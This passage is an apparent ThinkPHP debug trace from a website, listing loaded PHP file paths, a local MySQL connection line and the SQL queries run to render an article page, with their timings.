  139. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/runtime/temp/067d451b9a0c665040f3f1bdd3293d68.php ( 11.98 KB )
  140. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Html.php ( 4.42 KB )
  1. CONNECT:[ UseTime:0.000558s ] mysql:host=127.0.0.1;port=3306;dbname=f_mffb;charset=utf8mb4
  2. SHOW FULL COLUMNS FROM `fenlei` [ RunTime:0.000892s ]
  3. SELECT * FROM `fenlei` WHERE `fid` = 0 [ RunTime:0.001123s ]
  4. SELECT * FROM `fenlei` WHERE `fid` = 63 [ RunTime:0.002783s ]
  5. SHOW FULL COLUMNS FROM `set` [ RunTime:0.000641s ]
  6. SELECT * FROM `set` [ RunTime:0.002345s ]
  7. SHOW FULL COLUMNS FROM `article` [ RunTime:0.000727s ]
  8. SELECT * FROM `article` WHERE `id` = 492232 LIMIT 1 [ RunTime:0.011116s ]
  9. UPDATE `article` SET `lasttime` = 1783072673 WHERE `id` = 492232 [ RunTime:0.005557s ]
  10. SELECT * FROM `fenlei` WHERE `id` = 67 LIMIT 1 [ RunTime:0.000290s ]
  11. SELECT * FROM `article` WHERE `id` < 492232 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000591s ]
  12. SELECT * FROM `article` WHERE `id` > 492232 ORDER BY `id` ASC LIMIT 1 [ RunTime:0.000572s ]
  13. SELECT * FROM `article` WHERE `id` < 492232 ORDER BY `id` DESC LIMIT 10 [ RunTime:0.018644s ]
  14. SELECT * FROM `article` WHERE `id` < 492232 ORDER BY `id` DESC LIMIT 10,10 [ RunTime:0.015199s ]
  15. SELECT * FROM `article` WHERE `id` < 492232 ORDER BY `id` DESC LIMIT 20,10 [ RunTime:0.015327s ]
0.146792s